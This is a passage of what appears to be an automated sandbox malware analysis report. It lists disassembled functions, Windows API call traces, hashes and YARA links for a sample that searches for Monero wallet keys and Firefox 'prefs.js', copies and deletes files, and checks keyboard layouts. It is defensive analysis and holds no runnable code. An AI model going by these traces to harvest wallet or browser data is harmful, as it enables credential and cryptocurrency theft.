                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 5e7c9e16115b2bdfd56e1c891098b1fa90073b95dc4641f9a6e1257d335103e7
                        • Instruction ID: 0f54ec25a11d0a5f66e5aec30982ec5a4b10bd591364252a334815ea84737609
                        • Opcode Fuzzy Hash: 5e7c9e16115b2bdfd56e1c891098b1fa90073b95dc4641f9a6e1257d335103e7
                        • Instruction Fuzzy Hash: 22E12072A12159DAEB65FB60DD50EEE7338AF64210F4041D9B44B63095EF346F8ACF60
                        Function 0100F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010215B8,01020D96), ref: 0100F71E
                        • StrCmpCA.SHLWAPI(?,010215BC), ref: 0100F76F
                        • StrCmpCA.SHLWAPI(?,010215C0), ref: 0100F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0100FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 54601d50372d3bbbd8c82cf5ce634c6bb103b7a89554387571dc85ea24601a78
                        • Instruction ID: e1a7fae74fb81186c7c7304d73aa46ecd50d658477b8ee5e0f8a4e621d5fcba1
                        • Opcode Fuzzy Hash: 54601d50372d3bbbd8c82cf5ce634c6bb103b7a89554387571dc85ea24601a78
                        • Instruction Fuzzy Hash: 3DB17571A0115ADBDB25FF60DD54EED7379AF64300F4081A8E88A97184EF345B4ACF91
                        Function 010016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0102510C,?,?,?,010251B4,?,?,00000000,?,00000000), ref: 01001923
                        • StrCmpCA.SHLWAPI(?,0102525C), ref: 01001973
                        • StrCmpCA.SHLWAPI(?,01025304), ref: 01001989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 01001D40
                        • DeleteFileA.KERNEL32(00000000), ref: 01001DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 01001E20
                        • FindClose.KERNEL32(000000FF), ref: 01001E32
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 49f5a700cc80263b50e4443f4af3f7929fc12beff1e986feaf9ec17efc20206d
                        • Instruction ID: 1144aecb851d7b4cc88f6f513f18842bdd0d2b449ac38a1626cb325c403a4d36
                        • Opcode Fuzzy Hash: 49f5a700cc80263b50e4443f4af3f7929fc12beff1e986feaf9ec17efc20206d
                        • Instruction Fuzzy Hash: F5129371A11159DBDB19FB60DC94EEE7379AF24310F4041D9A58A63094EF386F8ACFA0
                        Function 0100DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,01020C2E), ref: 0100DE5E
                        • StrCmpCA.SHLWAPI(?,010214C8), ref: 0100DEAE
                        • StrCmpCA.SHLWAPI(?,010214CC), ref: 0100DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0100E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: ddc54d9d090e9957daebabfe6492fc5d12d6f6fc9725e3edb9cd3e664892eabe
                        • Instruction ID: b79b6c8a9888012a17b0f26a359dbb509695600cd46b4b8d82f1a93ad950821f
                        • Opcode Fuzzy Hash: ddc54d9d090e9957daebabfe6492fc5d12d6f6fc9725e3edb9cd3e664892eabe
                        • Instruction Fuzzy Hash: 50F1AE75911159DADB25FB60DD94EEE7338BF24310F8041DAA48A63094EF346B8ACF60
                        Function 0100DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010214B0,01020C2A), ref: 0100DAEB
                        • StrCmpCA.SHLWAPI(?,010214B4), ref: 0100DB33
                        • StrCmpCA.SHLWAPI(?,010214B8), ref: 0100DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0100DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: ef5707f1b9ea52a1f167213ca36f48a00b6c9e9a3827da3c8ad2ae33f630e6a1
                        • Instruction ID: 3b04b89bb43d6c0828372973cfac19d497760f326d3d891261ddb6f854d43ee8
                        • Opcode Fuzzy Hash: ef5707f1b9ea52a1f167213ca36f48a00b6c9e9a3827da3c8ad2ae33f630e6a1
                        • Instruction Fuzzy Hash: 31917676A00105DBDB15FBB0ED59DED737DAFA4300F408558E88B97188EE389B0D8BA1
                        Function 01017B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,010205AF), ref: 01017BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 01017BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 01017C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 01017C62
                        • LocalFree.KERNEL32(00000000), ref: 01017D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: befce8d2369322696880ee062f0e5de3b3d61c79129f0a4dc8fda7934a4f3573
                        • Instruction ID: 9f56ccf0fd1bb9c2c10977a4bfe842523b6e46f9befcc23bd5f314f540745c23
                        • Opcode Fuzzy Hash: befce8d2369322696880ee062f0e5de3b3d61c79129f0a4dc8fda7934a4f3573
                        • Instruction Fuzzy Hash: DB414A7194121DEBDB24DB94DC98BEEB3B8FB58710F104199E50A67184DB382F86CFA0
                        Function 013CF0BF Relevance: 10.4, Strings: 7, Instructions: 1635COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: AM9$AR>}$BM~{$UmG$o{~$vn/o$4JG
                        • API String ID: 0-4121454376
                        • Opcode ID: dbdbc6be15d3e8b47a46dc65830a870aecdc949fc04753f79a007b6cd93bc8be
                        • Instruction ID: 8064e8324ef79883837e0e8f10c17d63f8db6dbd173e3f292493f038114ac891
                        • Opcode Fuzzy Hash: dbdbc6be15d3e8b47a46dc65830a870aecdc949fc04753f79a007b6cd93bc8be
                        • Instruction Fuzzy Hash: A7B2E8F3A082049FE7046E2DEC8577ABBE9EF94720F16493DEAC4C3744EA3558058697
                        Function 0100E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,01020D73), ref: 0100E4A2
                        • StrCmpCA.SHLWAPI(?,010214F8), ref: 0100E4F2
                        • StrCmpCA.SHLWAPI(?,010214FC), ref: 0100E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 039535e8b037f00984876b9d5e61bcda6bbd7e3ee6ed6d0cde8785d6937c03de
                        • Instruction ID: 2305959cf50c5a2d895f6728f8a87590a18a7356c375549c73b17ae1674d29f7
                        • Opcode Fuzzy Hash: 039535e8b037f00984876b9d5e61bcda6bbd7e3ee6ed6d0cde8785d6937c03de
                        • Instruction Fuzzy Hash: 86128431A01159DBDB15FB60DD94EED7339AF64310F4045A9A58B67088EF386F8ACFA0
                        Function 013C4DF2 Relevance: 9.1, Strings: 6, Instructions: 1634COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 5|7$Y4<$e_v$m$j=$vyi$F;[
                        • API String ID: 0-232513389
                        • Opcode ID: 05b36d45acd2777129fb67f9ab33312fe56332a1fc0598ada31ab4cf050e5bd9
                        • Instruction ID: 9b9fcfc7515ff6c5c398b9af2530fff8e763758bf57f0dd767ce19032a5f66c0
                        • Opcode Fuzzy Hash: 05b36d45acd2777129fb67f9ab33312fe56332a1fc0598ada31ab4cf050e5bd9
                        • Instruction Fuzzy Hash: B9B207F390C2049FE3046E2DEC8567AFBE9EF94320F1A492DE6C4C7744EA3598418796
                        Function 013CD589 Relevance: 7.9, Strings: 5, Instructions: 1634COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $rAJ$Y4<$_Ej>${~f^$}xm>
                        • API String ID: 0-3724111844
                        • Opcode ID: b2c382c933aacf1fa331c3ab75af581b8a83047b74e8dbdbcdc35ff08d60be28
                        • Instruction ID: 835ca37d267a806a768ee7c19ced5b040f246bc6c1d3b50566b943f50b185e26
                        • Opcode Fuzzy Hash: b2c382c933aacf1fa331c3ab75af581b8a83047b74e8dbdbcdc35ff08d60be28
                        • Instruction Fuzzy Hash: 76B239F3A0C214AFE304AE2DEC8167ABBE9EF94720F16463DE6C4C7744E63558018696
                        Function 0100C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
